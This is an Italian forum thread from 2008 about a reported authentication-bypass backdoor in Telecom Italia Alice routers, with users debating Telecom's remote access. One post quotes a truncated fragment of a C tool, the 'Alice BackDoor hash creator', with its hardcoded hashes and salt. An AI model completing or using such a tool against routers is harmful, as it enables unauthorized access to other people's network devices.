Indice del forum Olimpo Informatico
I Forum di Zeus News
Leggi la newsletter gratuita - Attiva il Menu compatto
 
 FAQFAQ   CercaCerca   Lista utentiLista utenti   GruppiGruppi   RegistratiRegistrati 
 ProfiloProfilo   Messaggi privatiMessaggi privati   Log inLog in 

    Newsletter RSS Facebook Twitter Contatti Ricerca
Backdoor nei router alice
Nuovo argomento   Rispondi    Indice del forum -> Sicurezza
Precedente :: Successivo  
Autore Messaggio
ptah
Comune mortale
Comune mortale


Registrato: 18/10/08 09:24
Messaggi: 1

MessaggioInviato: 18 Ott 2008 09:34    Oggetto: Backdoor nei router alice Rispondi citando

Ciao a tutti volevo segnalarvi la scoperta di una backdoor nei router alice.



Telecom Italia Alice Pirelli routers backdoor

Alice Telecom Italia CPE Modem/Routers manufactered by Pirelli based on Broadcom platform.

Multiple Telecom Italia Routers Authentication Bypass Vulnerability

Quacuno ne sà di più a riguardo?


Cosa possono fare nel concreto?


Telecom entra nei router a nostra insaputa?


Grazie.
Top
Profilo Invia messaggio privato
bdoriano
Amministratore
Amministratore


Registrato: 02/04/07 12:05
Messaggi: 14391
Residenza: 3° pianeta del sistema solare...

MessaggioInviato: 18 Ott 2008 13:17    Oggetto: Rispondi citando

Ciao ptah e benvenuto, Ciao

I modem/router forniti da Alice/Telecom sono "blindati", nel senso che l'utente non può fare alcuna modifica alle impostazioni.
E', invece, risaputo che gli operatori alice/telecom possono "entrare" da remoto nel router per modificarne i parametri.

I links da te proposti mostrano come accedere dalla LAN (e non dalla WAN) alla configurazione del modem. In sintesi, aprono una possibilità in più all'utente di "sbloccarli" e di farci quello che vuole. Laughing

PS: se vuoi, puoi presentarti qui
Top
Profilo Invia messaggio privato
Riverside
Ban a tempo indeterminato
Ban a tempo indeterminato


Registrato: 29/02/08 22:32
Messaggi: 4396
Residenza: Riverside House

MessaggioInviato: 18 Ott 2008 13:28    Oggetto: Rispondi citando

Una validissima ragione per compraserlo, il router (tra l'altro, Telecom se lo fa, pure, pagare, visto che è in comodato d'uso).
Inoltre, sulla questione, Telecom, non ne ha mai reso informazioni e/ notizie ufficiali all'utente finale (nepure sui contratti è riportata una annotazione relativa alla riserva, da parte del fornitore di servizi, di potersi introdurre, a piacimento, nel sistema di un suo abbonato).
A mio parere, Telecom, sotto questo aspetto, si riserva un abuso che, per la legge italiana si chiama accesso non autorizzato a sistemi informatici (reato perseguibile penalmente) più un altro paio di reati; la cosa andrebbe segnalata al Garante (e per non farci mancare nulla, anche a Striscia la Notizia (su una questione del genere, Ricci ci farebbe un casino indescrivibile Wink ).
Per chiudere, una mia personale opnione: Telecom, malgrado tutto quello che è successo (vedi questione Tavaroli & BBS - Banda Bassotti Spioni) il vizietto non lo ha perso 8).


L'ultima modifica di Riverside il 18 Ott 2008 13:32, modificato 1 volta
Top
Profilo Invia messaggio privato
bdoriano
Amministratore
Amministratore


Registrato: 02/04/07 12:05
Messaggi: 14391
Residenza: 3° pianeta del sistema solare...

MessaggioInviato: 18 Ott 2008 13:32    Oggetto: Rispondi citando

Infatti, ai clienti e agli amici che scelgono Alice/Telecom, consiglio di comprarsi il router per poterglielo poi configurare al meglio. Razz
Top
Profilo Invia messaggio privato
Riverside
Ban a tempo indeterminato
Ban a tempo indeterminato


Registrato: 29/02/08 22:32
Messaggi: 4396
Residenza: Riverside House

MessaggioInviato: 18 Ott 2008 13:36    Oggetto: Rispondi

Pazzesco Shocked

Citazione:
static char *val[] =
{
"d41d8cd98f00b204e9800998ecf8427e",
"0cc175b9c0f1b6a831c399e269772661",
"900150983cd24fb0d6963f7d28e17f72",
"f96b697d7cb7938d525a2f31aaf161d0",
"c3fcd3d76192e4007dfb496cca67e13b",
"d174ab98d277d9f5a5611c2c9f419d9f",
"57edf4a22be3c955ac49da2e2107b67a"
};

static char saltOrig[] =
{0x04, 0x07, 0x67, 0x10, 0x02, 0x81, 0xFA, 0x66, 0x11, 0x41, 0x68, 0x11, 0x17, 0x01, 0x05, 0x22, 0x71, 0x04, 0x10, 0x33};

int main( int argc, char *argv[] )
{
FILE *f;
int i, j;
char output[33];
md5_context ctx;
unsigned char buf[1000];
unsigned char md5sum[16];
unsigned char salt[20];

printf( "****************************\n");
printf( "Alice BackDoor hash creator \n");
printf( "by saxdax and drPepperOne \n");
printf( "****************************\n\n");

if( argc < 2 )
{
printf( "\n Usage: %s pathfileMAC\n\n", argv[0] );
return 0;
}

if( ! ( f = fopen( argv[1], "rb" ) ) )
{
perror( "fopen" );
return( 1 );
}

md5_starts( &ctx );
Top
Profilo Invia messaggio privato
Mostra prima i messaggi di:   
Nuovo argomento   Rispondi    Indice del forum -> Sicurezza Tutti i fusi orari sono GMT + 2 ore
Pagina 1 di 1

 
Vai a:  
Non puoi inserire nuovi argomenti
Non puoi rispondere a nessun argomento
Non puoi modificare i tuoi messaggi
Non puoi cancellare i tuoi messaggi
Non puoi votare nei sondaggi